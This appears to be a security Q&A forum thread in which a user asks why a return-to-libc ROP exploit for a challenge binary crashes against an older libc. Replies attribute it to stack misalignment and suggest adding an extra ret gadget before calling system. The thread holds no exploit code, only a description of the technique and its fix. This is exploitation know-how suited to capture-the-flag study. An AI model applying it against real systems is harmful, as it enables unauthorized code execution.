0

I'm doing a pretty bog-standard return-to-libc attack and I'm in a bit of a pickle.

I first got the entire attack working with my local version of libc, then I used the version of libc provided by the challenge to work out the offsets on the remote target. It doesn't work on remote so I startup a Ubuntu Bionic container and LD_PRELOAD their version of libc, then fire up gdb to see what's up.

The attack works, I ROP to a gadget, the gadget loads "/bin/sh" into RDI, and then I crash.

Any ideas what I should be looking for here? Again this whole setup works with the identical binary linking against newer versions of libc.

ASLR, stack protection, and NX are all turned on, not that I think it matters for this attack.

Improve this question
5
  • Please do not post images of text. Copy/Paste and use the code formatting tool. Your image is very difficult to read.
    – schroeder
    Commented Jul 1, 2021 at 7:24
  • @schroeder I mean, the picture is just there for flavor. All of the information is provided in the text. Anyway closing the question, it was an alignment issue
    – nickelpro
    Commented Jul 1, 2021 at 7:27
  • Can't read the picture, so it's not providing anything
    – schroeder
    Commented Jul 1, 2021 at 7:28
  • Exactly and it's not supposed to, it's just "there for flavor". All of the information is in the text of the post
    – nickelpro
    Commented Jul 1, 2021 at 7:28
  • It was not adding "flavour" it was adding a color box. I have removed it to remove confusion since it was not adding anything.
    – schroeder
    Commented Jul 1, 2021 at 7:38

1 Answer 1

Reset to default
1

Alignment, ensure the stack is aligned following the ROP otherwise any instruction that requires an aligned stack will go haywire.

Improve this answer
1
  • 1
    Since you didn't say it, a simple way to ensure this is to add a simple gadget to a ret before you call system.
    – multithr3at3d
    Commented Sep 28, 2021 at 22:36

You must log in to answer this question.

Not the answer you're looking for? Browse other questions tagged .